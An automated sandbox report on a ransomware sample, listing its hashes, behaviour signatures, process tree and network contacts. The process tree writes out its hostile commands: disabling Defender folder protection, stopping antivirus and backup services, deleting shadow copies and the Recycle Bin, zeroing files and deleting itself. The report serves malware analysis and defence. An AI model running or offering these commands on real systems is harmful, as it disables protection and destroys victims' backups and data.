Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231130-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231130-en, locale:en-us, os:windows7-x64, system
  • submitted
    14/12/2023, 11:54 UTC

General

  • Target

    5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe

  • Size

    91KB

  • MD5

    be60e389a0108b2871dff12dfbb542ac

  • SHA1

    14b4e0bfac64ec0f837f84ab1780ca7ced8d670d

  • SHA256

    5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d

  • SHA512

    6051bec441434a80c34ee2752a3da9c3a0307cd1b551aa27a0f7f6f75b9bf64b172745d80f03eea054a03ebd2c493df21fd48d8fa3b706d46a6f7fee0e7c0641

  • SSDEEP

    1536:QguHLgeS6umiCp31W4qYXgsLlOqrgB9GpF7LXdarTkCAKL5dsluhtvM4CoLT6QPg:D6seqCp31Hgsp9a9GTrda8CAKLTsWkyI

Score
9/10

Malware Config

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (85) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Enumerates connected drives 3 TTPs 6 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 2 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
    "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"
    1⤵
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2392
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1212
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop avpsus /y
      2⤵
      PID:2748
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop avpsus /y
        3⤵
        PID:2804
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop McAfeeDLPAgentService /y
      2⤵
      PID:2968
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
        3⤵
        PID:1732
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop mfewc /y
      2⤵
      PID:3012
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop mfewc /y
        3⤵
        PID:2152
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop DefWatch /y
      2⤵
      PID:2564
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop DefWatch /y
        3⤵
        PID:2068
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop ccSetMgr /y
      2⤵
      PID:2676
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop ccSetMgr /y
        3⤵
        PID:1292
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop SavRoam /y
      2⤵
      PID:2660
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop SavRoam /y
        3⤵
        PID:2064
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop ccEvtMgr /y
      2⤵
      PID:2616
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop ccEvtMgr /y
        3⤵
        PID:2228
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop RTVscan /y
      2⤵
      PID:2252
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop RTVscan /y
        3⤵
        PID:2944
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop Intuit.QuickBooks.FCS /y
      2⤵
      PID:2840
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
        3⤵
        PID:2632
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop QBIDPService /y
      2⤵
      PID:2496
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop QBIDPService /y
        3⤵
        PID:3016
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop QBCFMonitorService /y
      2⤵
      PID:2624
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop QBCFMonitorService /y
        3⤵
        PID:1632
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop QBFCService /y
      2⤵
      PID:2620
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop QBFCService /y
        3⤵
        PID:2504
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop NetBackup BMR MTFTP Service /y
      2⤵
      PID:1340
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
        3⤵
        PID:1464
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop BMR Boot Service /y
      2⤵
      PID:2132
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop BMR Boot Service /y
        3⤵
        PID:2948
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop YooBackup /y
      2⤵
      PID:2008
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop YooBackup /y
        3⤵
        PID:2316
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop stc_raw_agent /y
      2⤵
      PID:852
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop stc_raw_agent /y
        3⤵
        PID:2288
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop VSNAPVSS /y
      2⤵
      PID:1524
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop VSNAPVSS /y
        3⤵
        PID:1076
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop veeam /y
      2⤵
      PID:1940
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop veeam /y
        3⤵
        PID:2056
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop PDVFSService /y
      2⤵
      PID:2688
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop PDVFSService /y
        3⤵
        PID:1900
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamNFSSvc /y
      2⤵
      PID:2520
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop VeeamNFSSvc /y
        3⤵
        PID:1172
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamDeploymentService /y
      2⤵
      PID:848
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop VeeamDeploymentService /y
        3⤵
        PID:1704
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop VeeamTransportSvc /y
      2⤵
      PID:1892
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop VeeamTransportSvc /y
        3⤵
        PID:2320
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop zhudongfangyu /y
      2⤵
      PID:2528
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop zhudongfangyu /y
        3⤵
        PID:2304
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop YooIT /y
      2⤵
      PID:1044
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop YooIT /y
        3⤵
        PID:2160
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecVSSProvider /y
      2⤵
      PID:2780
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop BackupExecVSSProvider /y
        3⤵
        PID:488
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecAgentAccelerator /y
      2⤵
      PID:596
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
        3⤵
        PID:1164
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecRPCService /y
      2⤵
      PID:1472
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop BackupExecRPCService /y
        3⤵
        PID:1320
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecManagementService /y
      2⤵
      PID:652
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecJobEngine /y
      2⤵
      PID:1456
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecDiveciMediaService /y
      2⤵
      PID:1240
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop BackupExecAgentBrowser /y
      2⤵
      PID:588
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop AcrSch2Svc /y
      2⤵
      PID:860
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop AcrSch2Svc /y
        3⤵
        PID:2300
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop AcronisAgent /y
      2⤵
      PID:824
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop AcronisAgent /y
        3⤵
        PID:344
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop CASAD2DWebSvc /y
      2⤵
      PID:692
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop CASAD2DWebSvc /y
        3⤵
        PID:1656
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop CAARCUpdateSvc /y
      2⤵
      PID:1564
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop CAARCUpdateSvc /y
        3⤵
        PID:1440
    • C:\Windows\SysWOW64\net.exe
      "net.exe" stop sophos /y
      2⤵
      PID:1832
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop sophos /y
        3⤵
        PID:1572
    • C:\Windows\SysWOW64\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      2⤵
      • Launches sc.exe
      PID:788
    • C:\Windows\SysWOW64\sc.exe
      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      2⤵
      • Launches sc.exe
      PID:644
    • C:\Windows\SysWOW64\sc.exe
      "sc.exe" config SstpSvc start= disabled
      2⤵
      • Launches sc.exe
      PID:1224
    • C:\Windows\SysWOW64\sc.exe
      "sc.exe" config SQLWriter start= disabled
      2⤵
      • Launches sc.exe
      PID:2164
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1244
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2888
    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                                              2⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:2108
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2336
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2140
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:712
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                              • Enumerates connected drives
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:1176
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                              • Enumerates connected drives
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:912
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:1904
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                              • Enumerates connected drives
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2060
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2908
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2376
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                              • Enumerates connected drives
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:1584
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2420
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2352
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:2764
                                                                                                                                            • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                              "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                              2⤵
                                                                                                                                              • Interacts with shadow copies
                                                                                                                                              PID:1952
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
                                                                                                                                              2⤵
                                                                                                                                                PID:2568
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp1A66.bat
                                                                                                                                                2⤵
                                                                                                                                                  PID:1892
                                                                                                                                                • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
                                                                                                                                                  2⤵
                                                                                                                                                  • Opens file in notepad (likely ransom note)
                                                                                                                                                  PID:2800
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                                                                                                  2⤵
                                                                                                                                                    PID:2532
                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                      ping 127.0.0.7 -n 3
                                                                                                                                                      3⤵
                                                                                                                                                      • Runs ping.exe
                                                                                                                                                      PID:1176
                                                                                                                                                    • C:\Windows\SysWOW64\fsutil.exe
                                                                                                                                                      fsutil file setZeroData offset=0 length=524288 “%s”
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1652
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                      2⤵
                                                                                                                                                      • Deletes itself
                                                                                                                                                      PID:2616
                                                                                                                                                      • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                        choice /C Y /N /D Y /T 3
                                                                                                                                                        3⤵
                                                                                                                                                          PID:952
                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2256
                                                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                        C:\Windows\system32\net1 stop BackupExecManagementService /y
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1544
                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                          C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1036
                                                                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                            C:\Windows\system32\net1 stop BackupExecJobEngine /y
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2428
                                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                                              \??\C:\Windows\system32\conhost.exe "463061751-1582314381438124199-559438155264157425-8942657485593056261063045831"
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                              PID:2660
                                                                                                                                                            • C:\Windows\system32\vssvc.exe
                                                                                                                                                              C:\Windows\system32\vssvc.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:2996

                                                                                                                                                            Network

                                                                                                                                                            • flag-us
                                                                                                                                                              DNS
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              Remote address:
                                                                                                                                                              8.8.8.8:53
                                                                                                                                                              Request
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              IN A
                                                                                                                                                              Response
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              IN A
                                                                                                                                                              185.199.108.133
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              IN A
                                                                                                                                                              185.199.109.133
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              IN A
                                                                                                                                                              185.199.110.133
                                                                                                                                                              raw.githubusercontent.com
                                                                                                                                                              IN A
                                                                                                                                                              185.199.111.133
• (US) DNS www.google.com
  Process: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  Remote address: 8.8.8.8:53
  Request: www.google.com IN A
  Response: www.google.com IN A 142.250.200.4
• (GB) GET https://www.google.com/
  Process: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  Remote address: 142.250.200.4:443
  Request:
    GET / HTTP/1.1
    Host: www.google.com
    Connection: Keep-Alive
  Response:
    HTTP/1.1 200 OK
    Date: Thu, 14 Dec 2023 11:55:04 GMT
    Expires: -1
    Cache-Control: private, max-age=0
    Content-Type: text/html; charset=ISO-8859-1
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-YJg91CzRLcgSGapKGL74gQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
    Server: gws
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: SOCS=CAAaBgiAi-mrBg; expires=Sun, 12-Jan-2025 11:55:04 GMT; path=/; domain=.google.com; Secure; SameSite=lax
    Set-Cookie: AEC=Ackid1TNdRkiV-cfseeygExHNZyXDcayNtSkGQYVNjDLOdxGjII8HmrFuKY; expires=Tue, 11-Jun-2024 11:55:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
    Set-Cookie: __Secure-ENID=16.SE=NAxD8G57McXfatvfzIY_ymPImV5SXvTsCje-AY3cp3s6yoEGv8CPDAzzxra6MLxp5fXYpvxophVJy0cJzCXugAia3Hv9-lk9V2THJOIWDUCNHkqcJoqCFQjtHNhknlk5gB0ywVY9JLm4TCxD_gPhQbI9lHvq3UfbKWS6QVV-K_w; expires=Mon, 13-Jan-2025 04:13:22 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
    Set-Cookie: CONSENT=PENDING+679; expires=Sat, 13-Dec-2025 11:55:04 GMT; path=/; domain=.google.com; Secure
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Accept-Ranges: none
    Vary: Accept-Encoding
    Transfer-Encoding: chunked
• (US) DNS pki.goog
  Process: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  Remote address: 8.8.8.8:53
  Request: pki.goog IN A
  Response: pki.goog IN A 216.239.32.29
• (US) GET http://pki.goog/gsr1/gsr1.crt
  Process: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  Remote address: 216.239.32.29:80
  Request:
    GET /gsr1/gsr1.crt HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: pki.goog
  Response:
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 889
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Thu, 14 Dec 2023 11:19:08 GMT
    Expires: Thu, 14 Dec 2023 12:09:08 GMT
    Cache-Control: public, max-age=3000
    Age: 2155
    Last-Modified: Wed, 20 May 2020 16:45:00 GMT
    Content-Type: application/pkix-cert
    Vary: Accept-Encoding
• (US) DNS www.microsoft.com
  Process: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  Remote address: 8.8.8.8:53
  Request: www.microsoft.com IN A
  Response:
    www.microsoft.com IN CNAME www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net IN CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net IN CNAME e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net IN A 173.222.13.219
• (US) DNS www.poweradmin.com
  Process: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  Remote address: 8.8.8.8:53
  Request: www.poweradmin.com IN A
  Response:
    www.poweradmin.com IN CNAME poweradmin.com
    poweradmin.com IN A 52.1.55.52
• 185.199.108.133:443  raw.githubusercontent.com  tls
  Process: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  Sent: 359 B (5 packets)  Received: 219 B (5 packets)
• 142.250.200.4:443  https://www.google.com/  tls, http
  Process: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  Sent: 1.9kB (33 packets)  Received: 61.4kB (52 packets)
  HTTP Request: GET https://www.google.com/
  HTTP Response: 200
• 216.239.32.29:80  http://pki.goog/gsr1/gsr1.crt  http
  Process: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  Sent: 351 B (5 packets)  Received: 1.8kB (4 packets)
  HTTP Request: GET http://pki.goog/gsr1/gsr1.crt
  HTTP Response: 200
• 52.1.55.52:443  www.poweradmin.com  tls
  Process: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  Sent: 260 B (3 packets)  Received: 92 B (2 packets)
• 52.1.55.52:443  www.poweradmin.com  tls
  Process: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  Sent: 260 B (3 packets)  Received: 92 B (2 packets)
• 8.8.8.8:53  raw.githubusercontent.com  dns
  Process: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  Sent: 71 B (1 packet)  Received: 135 B (1 packet)
  DNS Request: raw.githubusercontent.com
  DNS Response: 185.199.108.133, 185.199.109.133, 185.199.110.133, 185.199.111.133
• 8.8.8.8:53  www.google.com  dns
  Process: 5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
  Sent: 60 B (1 packet)  Received: 76 B (1 packet)
  DNS Request: www.google.com
  DNS Response:

                                                                                                                                                              142.250.200.4

                                                                                                                                                            • 8.8.8.8:53
                                                                                                                                                              pki.goog
                                                                                                                                                              dns
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              54 B
                                                                                                                                                              70 B
                                                                                                                                                              1
                                                                                                                                                              1

                                                                                                                                                              DNS Request

                                                                                                                                                              pki.goog

                                                                                                                                                              DNS Response

                                                                                                                                                              216.239.32.29

                                                                                                                                                            • 8.8.8.8:53
                                                                                                                                                              www.microsoft.com
                                                                                                                                                              dns
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              63 B
                                                                                                                                                              230 B
                                                                                                                                                              1
                                                                                                                                                              1

                                                                                                                                                              DNS Request

                                                                                                                                                              www.microsoft.com

                                                                                                                                                              DNS Response

                                                                                                                                                              173.222.13.219

                                                                                                                                                            • 8.8.8.8:53
                                                                                                                                                              www.poweradmin.com
                                                                                                                                                              dns
                                                                                                                                                              5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
                                                                                                                                                              64 B
                                                                                                                                                              94 B
                                                                                                                                                              1
                                                                                                                                                              1

                                                                                                                                                              DNS Request

                                                                                                                                                              www.poweradmin.com

                                                                                                                                                              DNS Response

                                                                                                                                                              52.1.55.52

                                                                                                                                                            MITRE ATT&CK Enterprise v15


Downloads

• C:\HOW_TO_DECYPHER_FILES.txt
  Filesize: 1KB
  MD5: 8431b684bc613c7d26c3c02d145efb69
  SHA1: 1d20d2f3fb60343bf6fde19f0e1499ee927b1106
  SHA256: 18675fab39e559bedd77139c7fe49d77b353e9940cfdf54058036af8a90f620e
  SHA512: edbbb6337991756c6cb0d3660e68d9319764d3cfc703aa354ea7e0b13506cd42960f8e285b938fd13fb2b24f3fa15f359e4beeab538e058f75c04cf11fff5c48

• memory/1212-5-0x0000000070690000-0x0000000070C3B000-memory.dmp
  Filesize: 5.7MB

• memory/1212-6-0x0000000001C10000-0x0000000001C50000-memory.dmp
  Filesize: 256KB

• memory/1212-7-0x0000000070690000-0x0000000070C3B000-memory.dmp
  Filesize: 5.7MB

• memory/1212-8-0x0000000001C10000-0x0000000001C50000-memory.dmp
  Filesize: 256KB

• memory/1212-9-0x0000000001C10000-0x0000000001C50000-memory.dmp
  Filesize: 256KB

• memory/1212-10-0x0000000070690000-0x0000000070C3B000-memory.dmp
  Filesize: 5.7MB

• memory/2392-0-0x0000000000380000-0x000000000039C000-memory.dmp
  Filesize: 112KB

• memory/2392-1-0x0000000074800000-0x0000000074EEE000-memory.dmp
  Filesize: 6.9MB

• memory/2392-2-0x0000000000500000-0x0000000000540000-memory.dmp
  Filesize: 256KB

• memory/2392-150-0x0000000074800000-0x0000000074EEE000-memory.dmp
  Filesize: 6.9MB
